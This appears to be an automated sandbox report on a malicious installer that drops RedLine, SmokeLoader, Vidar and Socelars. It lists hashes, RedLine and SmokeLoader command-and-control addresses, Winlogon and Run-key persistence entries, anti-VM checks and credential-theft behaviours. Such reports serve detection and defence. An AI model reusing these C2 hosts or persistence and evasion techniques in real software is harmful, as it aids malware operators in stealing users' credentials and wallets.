Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
Resubmissions
23-09-2021 21:08
210923-zyzyaafbfr 1022-09-2021 10:40
210922-mqyzssehck 1022-09-2021 05:21
210922-f114ksecck 1021-09-2021 05:29
210921-f6zspsgdg2 1020-09-2021 21:51
210920-1qj3jafed9 1020-09-2021 19:44
210920-yftswafca9 1020-09-2021 08:28
210920-kczcasgahr 1020-09-2021 04:42
210920-fb3acafedj 1020-09-2021 04:42
210920-fb2zksfecr 10Analysis
-
max time kernel
1202s -
max time network
1206s -
platform
windows11_x64 -
resource
win11 -
submitted
20-09-2021 08:28
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210916
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210916
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-jp
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-fr
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-en
Behavioral task
behavioral9
Sample
setup_x86_x64_install.exe
Resource
win10-de
General
-
Target
setup_x86_x64_install.exe
-
Size
4.0MB
-
MD5
73491325fde5366b31c09da701d07dd6
-
SHA1
a4e1ada57e590c2df30fc26fad5f3ca57ad922b1
-
SHA256
56a461a6cc8ad9c10cdc1d19a12d5deceb9ebefb0c871a3fc2eb83c466947a11
-
SHA512
28b5008c542e9c486529934f74774d6d2de4b98531483b24c3c7cf82bf2214b959a1feb0085014026dd278d2a18ac6ae8a0e5a7ebb36be28abf6dccbf2d38e88
Malware Config
Extracted
redline
janesam
65.108.20.195:6774
Extracted
smokeloader
2020
http://venerynnet1.top/
http://kevonahira2.top/
http://vegangelist3.top/
http://kingriffaele4.top/
http://arakeishant5.top/
Signatures
-
Modifies WinLogon for persistence 2 TTPs 11 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\fontdrvhost.exe\", \"C:\\Users\\Admin\\Documents\\emBhBCB9JrvjwUss_kimXWYl\\n42jvMA2SmHdRuAJFM9TIANN.exe\", \"C:\\Documents and Settings\\smss.exe\", \"C:\\Users\\Admin\\AppData\\Local\\Temp\\tmpAB12\\1AF1.exe\", \"C:\\Users\\Default\\AppData\\Local\\lsass.exe\", \"C:\\PerfLogs\\msiexec.exe\"" DriverRealtekHDmaster.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\fontdrvhost.exe\", \"C:\\Users\\Admin\\Documents\\emBhBCB9JrvjwUss_kimXWYl\\n42jvMA2SmHdRuAJFM9TIANN.exe\", \"C:\\Documents and Settings\\smss.exe\", \"C:\\Users\\Admin\\AppData\\Local\\Temp\\tmpAB12\\1AF1.exe\", \"C:\\Users\\Default\\AppData\\Local\\lsass.exe\", \"C:\\PerfLogs\\msiexec.exe\", \"C:\\odt\\ultramediaburner.exe\"" DriverRealtekHDmaster.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\fontdrvhost.exe\", \"C:\\Users\\Admin\\Documents\\emBhBCB9JrvjwUss_kimXWYl\\n42jvMA2SmHdRuAJFM9TIANN.exe\", \"C:\\Documents and Settings\\smss.exe\", \"C:\\Users\\Admin\\AppData\\Local\\Temp\\tmpAB12\\1AF1.exe\", \"C:\\Users\\Default\\AppData\\Local\\lsass.exe\", \"C:\\PerfLogs\\msiexec.exe\", \"C:\\odt\\ultramediaburner.exe\", \"C:\\odt\\wininit.exe\", \"C:\\Program Files\\Windows NT\\Accessories\\timeout.exe\", \"C:\\Windows\\System32\\rmclient\\msiexec.exe\"" DriverRealtekHDmaster.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\fontdrvhost.exe\", \"C:\\Users\\Admin\\Documents\\emBhBCB9JrvjwUss_kimXWYl\\n42jvMA2SmHdRuAJFM9TIANN.exe\", \"C:\\Documents and Settings\\smss.exe\", \"C:\\Users\\Admin\\AppData\\Local\\Temp\\tmpAB12\\1AF1.exe\", \"C:\\Users\\Default\\AppData\\Local\\lsass.exe\", \"C:\\PerfLogs\\msiexec.exe\", \"C:\\odt\\ultramediaburner.exe\", \"C:\\odt\\wininit.exe\", \"C:\\Program Files\\Windows NT\\Accessories\\timeout.exe\", \"C:\\Windows\\System32\\rmclient\\msiexec.exe\", \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\winlogon.exe\"" DriverRealtekHDmaster.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\fontdrvhost.exe\", \"C:\\Users\\Admin\\Documents\\emBhBCB9JrvjwUss_kimXWYl\\n42jvMA2SmHdRuAJFM9TIANN.exe\"" DriverRealtekHDmaster.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\fontdrvhost.exe\", \"C:\\Users\\Admin\\Documents\\emBhBCB9JrvjwUss_kimXWYl\\n42jvMA2SmHdRuAJFM9TIANN.exe\", \"C:\\Documents and Settings\\smss.exe\", \"C:\\Users\\Admin\\AppData\\Local\\Temp\\tmpAB12\\1AF1.exe\"" DriverRealtekHDmaster.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\fontdrvhost.exe\", \"C:\\Users\\Admin\\Documents\\emBhBCB9JrvjwUss_kimXWYl\\n42jvMA2SmHdRuAJFM9TIANN.exe\", \"C:\\Documents and Settings\\smss.exe\", \"C:\\Users\\Admin\\AppData\\Local\\Temp\\tmpAB12\\1AF1.exe\", \"C:\\Users\\Default\\AppData\\Local\\lsass.exe\"" DriverRealtekHDmaster.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\fontdrvhost.exe\", \"C:\\Users\\Admin\\Documents\\emBhBCB9JrvjwUss_kimXWYl\\n42jvMA2SmHdRuAJFM9TIANN.exe\", \"C:\\Documents and Settings\\smss.exe\", \"C:\\Users\\Admin\\AppData\\Local\\Temp\\tmpAB12\\1AF1.exe\", \"C:\\Users\\Default\\AppData\\Local\\lsass.exe\", \"C:\\PerfLogs\\msiexec.exe\", \"C:\\odt\\ultramediaburner.exe\", \"C:\\odt\\wininit.exe\"" DriverRealtekHDmaster.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\fontdrvhost.exe\", \"C:\\Users\\Admin\\Documents\\emBhBCB9JrvjwUss_kimXWYl\\n42jvMA2SmHdRuAJFM9TIANN.exe\", \"C:\\Documents and Settings\\smss.exe\", \"C:\\Users\\Admin\\AppData\\Local\\Temp\\tmpAB12\\1AF1.exe\", \"C:\\Users\\Default\\AppData\\Local\\lsass.exe\", \"C:\\PerfLogs\\msiexec.exe\", \"C:\\odt\\ultramediaburner.exe\", \"C:\\odt\\wininit.exe\", \"C:\\Program Files\\Windows NT\\Accessories\\timeout.exe\"" DriverRealtekHDmaster.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\fontdrvhost.exe\"" DriverRealtekHDmaster.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\fontdrvhost.exe\", \"C:\\Users\\Admin\\Documents\\emBhBCB9JrvjwUss_kimXWYl\\n42jvMA2SmHdRuAJFM9TIANN.exe\", \"C:\\Documents and Settings\\smss.exe\"" DriverRealtekHDmaster.exe -
Process spawned unexpected child process 15 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5688 4936 rundll32.exe 30 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6104 4936 rundll32.exe 30 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7276 4936 rundll32.exe 30 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7208 4936 rundll32.exe 30 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6296 4936 schtasks.exe 30 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3140 4936 schtasks.exe 30 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5456 4936 schtasks.exe 30 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5004 4936 schtasks.exe 30 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5420 4936 schtasks.exe 30 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3952 4936 schtasks.exe 30 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5196 4936 schtasks.exe 30 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6504 4936 schtasks.exe 30 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7360 4936 schtasks.exe 30 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2160 4936 schtasks.exe 30 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5276 4936 schtasks.exe 30 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
resource yara_rule behavioral4/memory/2176-274-0x0000000005750000-0x000000000576D000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral4/files/0x000100000002b1c5-174.dat family_socelars behavioral4/files/0x000100000002b1c5-196.dat family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 24 IoCs
description pid Process procid_target PID 5940 created 4660 5940 setup_2.exe 225 PID 5924 created 4748 5924 WerFault.exe 104 PID 1152 created 5152 1152 uLyNXR2rKJA12xllJQXgTAdi.exe 109 PID 3248 created 1312 3248 1612556.scr 321 PID 6316 created 5880 6316 WerFault.exe 128 PID 2568 created 5656 2568 WerFault.exe 127 PID 3360 created 6784 3360 WerFault.exe 154 PID 6288 created 5564 6288 Process not Found 136 PID 2184 created 4896 2184 WerFault.exe 131 PID 2548 created 5972 2548 WerFault.exe 141 PID 5308 created 1212 5308 WerFault.exe 144 PID 3500 created 6460 3500 WerFault.exe 161 PID 1108 created 6180 1108 WerFault.exe 236 PID 6448 created 1152 6448 WerFault.exe 233 PID 3640 created 6220 3640 WerFault.exe 232 PID 5560 created 6132 5560 WerFault.exe 206 PID 7584 created 7364 7584 WerFault.exe 277 PID 3700 created 3988 3700 WerFault.exe 309 PID 1312 created 2068 1312 WerFault.exe 314 PID 2784 created 4848 2784 WerFault.exe 330 PID 6900 created 6360 6900 powershell.exe 396 PID 8012 created 3052 8012 WerFault.exe 341 PID 6236 created 1132 6236 WerFault.exe 360 PID 5952 created 1852 5952 WerFault.exe 373 -
resource yara_rule behavioral4/memory/5956-407-0x0000000000830000-0x0000000000DA7000-memory.dmp evasion behavioral4/memory/5956-415-0x0000000000830000-0x0000000000DA7000-memory.dmp evasion -
resource yara_rule behavioral4/memory/5956-407-0x0000000000830000-0x0000000000DA7000-memory.dmp redline -
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
resource yara_rule behavioral4/memory/5152-294-0x0000000000A80000-0x0000000000B54000-memory.dmp family_vidar behavioral4/memory/5972-469-0x0000000000A50000-0x0000000000B24000-memory.dmp family_vidar -
resource yara_rule behavioral4/files/0x000100000002b1bc-153.dat aspack_v212_v242 behavioral4/files/0x000100000002b1bb-154.dat aspack_v212_v242 behavioral4/files/0x000100000002b1bc-157.dat aspack_v212_v242 behavioral4/files/0x000100000002b1bb-156.dat aspack_v212_v242 behavioral4/files/0x000100000002b1be-160.dat aspack_v212_v242 behavioral4/files/0x000100000002b1be-162.dat aspack_v212_v242 -
Blocklisted process makes network request 43 IoCs
flow pid Process 310 4392 MsiExec.exe 312 4392 MsiExec.exe 313 4392 MsiExec.exe 315 4392 MsiExec.exe 317 4392 MsiExec.exe 319 4392 MsiExec.exe 320 4392 MsiExec.exe 321 4392 MsiExec.exe 322 4392 MsiExec.exe 323 4392 MsiExec.exe 324 4392 MsiExec.exe 325 4392 MsiExec.exe 326 4392 MsiExec.exe 328 4392 MsiExec.exe 329 4392 MsiExec.exe 330 4392 MsiExec.exe 331 4392 MsiExec.exe 332 4392 MsiExec.exe 333 4392 MsiExec.exe 334 4392 MsiExec.exe 335 4392 MsiExec.exe 337 4392 MsiExec.exe 338 4392 MsiExec.exe 339 4392 MsiExec.exe 340 4392 MsiExec.exe 341 4392 MsiExec.exe 342 4392 MsiExec.exe 343 4392 MsiExec.exe 345 4392 MsiExec.exe 346 4392 MsiExec.exe 347 4392 MsiExec.exe 348 4392 MsiExec.exe 349 4392 MsiExec.exe 351 4392 MsiExec.exe 353 4392 MsiExec.exe 354 4392 MsiExec.exe 355 4392 MsiExec.exe 356 4392 MsiExec.exe 357 4392 MsiExec.exe 358 4392 MsiExec.exe 359 4392 MsiExec.exe 360 4392 MsiExec.exe 361 4392 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts Ze2ro.exe -
Executes dropped EXE 64 IoCs
pid Process 4996 setup_installer.exe 4992 setup_install.exe 1060 Sun1917b8fb5f09db8.exe 1312 Sun19262b9e49ad.exe 4596 Sun19e4ade31b2a.exe 4660 Sun1908b94df837b3158.exe 4280 Sun193fda712d9f1.exe 4748 Sun19de8ff4b6aefeb8.exe 3528 Sun191101c1aaa.exe 3116 Sun1905815e51282417.exe 3952 Sun1966fb31dd5a07.exe 4712 Sun198361825f4.exe 2176 Sun195a1614ec24e6a.exe 5152 Sun19eb40faaaa9.exe 5208 Sun1966fb31dd5a07.tmp 5600 Ze2ro.exe 5808 xp8HI_bx8rPBYFlZRfG1vMN3.exe 5852 4957782.scr 6072 LzmwAqmV.exe 4924 7165322.scr 2828 Chrome 5.exe 5532 Conhost.exe 5656 2.exe 5760 3379467.scr 4896 setup.exe 5284 7E47t5OZ9Y2AslGLa71zs0Ko.exe 5388 ultramediaburner.exe 5488 emBhBCB9JrvjwUss_kimXWYl.exe 5240 2lzrdpLz3EwEV8Dc9XpMntEo.exe 3220 4140297.exe 2156 bMq1vc4oZncxHmzpLubp0EnH.exe 1212 bjR2Xj9UB1KeMGiahQDr2ahv.exe 5704 F26HMOE0VyruSatwyckTLw9O.exe 5564 lWqFOBNzObqshYcVbU9EPdxn.exe 6004 svchost.exe 5816 VDKr3kJPXY5MiEh2sgBh3rKq.exe 5956 sihost64.exe 6160 B6srqwApy9H9mq1fCjmNFEFo.exe 6152 hnLz9ujGWUUQxBJp7pt3qDvv.exe 5340 FElanqa0GqBIMxoehkuxM992.exe 5972 t0TWzXF0UmHxn2kAnmhu_AuL.exe 6460 udptest.exe 6728 Install.exe 6784 5.exe 6792 8397358.scr 6948 cm3.exe 7048 md8_8eus.exe 7020 LivelyScreenRecF18.exe 7092 inst001.exe 5940 setup_2.exe 852 f.exe 6240 wwi.exe 6220 MQQniL3nVAJGvnEG3rlhokiW.exe 5192 setup_2.tmp 5884 jhuuee.exe 6704 3972948.exe 2424 emWhgHV8U1Es49MkR7UHHWse.exe 3176 BearVpn 3.exe 5908 vJsRieSJjWMc0EdygYU_6eeY.exe 3228 setup_2.exe 5768 6444653.scr 1300 B6srqwApy9H9mq1fCjmNFEFo.exe 6976 985091.exe 1896 vJsRieSJjWMc0EdygYU_6eeY.exe -
Checks BIOS information in registry 2 TTPs 35 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8397358.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8397358.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1305362.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1AF1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5730.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1AF1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7E47t5OZ9Y2AslGLa71zs0Ko.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sihost64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion hnLz9ujGWUUQxBJp7pt3qDvv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1612556.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5730.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7E47t5OZ9Y2AslGLa71zs0Ko.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3379467.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion hnLz9ujGWUUQxBJp7pt3qDvv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 985091.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2lzrdpLz3EwEV8Dc9XpMntEo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1305362.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Conhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Conhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1612556.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion F26HMOE0VyruSatwyckTLw9O.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion emBhBCB9JrvjwUss_kimXWYl.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2lzrdpLz3EwEV8Dc9XpMntEo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion F26HMOE0VyruSatwyckTLw9O.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion emBhBCB9JrvjwUss_kimXWYl.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion wwi.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4140297.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sihost64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3379467.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wwi.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 985091.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4140297.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7165322.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7165322.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Loads dropped DLL 41 IoCs
pid Process 4992 setup_install.exe 4992 setup_install.exe 4992 setup_install.exe 4992 setup_install.exe 4992 setup_install.exe 4992 setup_install.exe 5208 Sun1966fb31dd5a07.tmp 5880 rundll32.exe 5340 FElanqa0GqBIMxoehkuxM992.exe 5192 setup_2.tmp 5628 Conhost.exe 5956 sihost64.exe 5956 sihost64.exe 5956 sihost64.exe 6180 rundll32.exe 7364 rundll32.exe 5204 installer.exe 5204 installer.exe 5204 installer.exe 4848 rundll32.exe 5428 MsiExec.exe 5428 MsiExec.exe 4392 MsiExec.exe 4392 MsiExec.exe 4392 MsiExec.exe 4392 MsiExec.exe 4392 MsiExec.exe 4392 MsiExec.exe 4392 MsiExec.exe 4392 MsiExec.exe 4392 MsiExec.exe 4392 MsiExec.exe 5204 installer.exe 4392 MsiExec.exe 4392 MsiExec.exe 7808 3E59.exe 7808 3E59.exe 7808 3E59.exe 6108 MsiExec.exe 6108 MsiExec.exe 4392 MsiExec.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral4/files/0x000200000002b1ef-296.dat themida behavioral4/files/0x000200000002b1ef-301.dat themida behavioral4/files/0x000100000002b209-322.dat themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 25 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Users\\Default\\AppData\\Local\\lsass.exe\"" DriverRealtekHDmaster.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\PerfLogs\\msiexec.exe\"" DriverRealtekHDmaster.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\odt\\wininit.exe\"" DriverRealtekHDmaster.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\timeout = "\"C:\\Program Files\\Windows NT\\Accessories\\timeout.exe\"" DriverRealtekHDmaster.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\fontdrvhost.exe\"" DriverRealtekHDmaster.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\n42jvMA2SmHdRuAJFM9TIANN = "\"C:\\Users\\Admin\\Documents\\emBhBCB9JrvjwUss_kimXWYl\\n42jvMA2SmHdRuAJFM9TIANN.exe\"" DriverRealtekHDmaster.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\n42jvMA2SmHdRuAJFM9TIANN = "\"C:\\Users\\Admin\\Documents\\emBhBCB9JrvjwUss_kimXWYl\\n42jvMA2SmHdRuAJFM9TIANN.exe\"" DriverRealtekHDmaster.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\1AF1 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\tmpAB12\\1AF1.exe\"" DriverRealtekHDmaster.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\Windows\\System32\\rmclient\\msiexec.exe\"" DriverRealtekHDmaster.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\Windows\\System32\\rmclient\\msiexec.exe\"" DriverRealtekHDmaster.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\winlogon.exe\"" DriverRealtekHDmaster.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\winlogon.exe\"" DriverRealtekHDmaster.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\PerfLogs\\msiexec.exe\"" DriverRealtekHDmaster.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\ultramediaburner = "\"C:\\odt\\ultramediaburner.exe\"" DriverRealtekHDmaster.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ultramediaburner = "\"C:\\odt\\ultramediaburner.exe\"" DriverRealtekHDmaster.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\timeout = "\"C:\\Program Files\\Windows NT\\Accessories\\timeout.exe\"" DriverRealtekHDmaster.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\odt\\wininit.exe\"" DriverRealtekHDmaster.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\fontdrvhost.exe\"" DriverRealtekHDmaster.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Documents and Settings\\smss.exe\"" DriverRealtekHDmaster.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Users\\Default\\AppData\\Local\\lsass.exe\"" DriverRealtekHDmaster.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\WindowsPowerShell\\Xaerehacala.exe\"" Ze2ro.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\service = "C:\\Users\\Admin\\AppData\\Local\\Temp\\F92F.exe" F92F.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Documents and Settings\\smss.exe\"" DriverRealtekHDmaster.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1AF1 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\tmpAB12\\1AF1.exe\"" DriverRealtekHDmaster.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
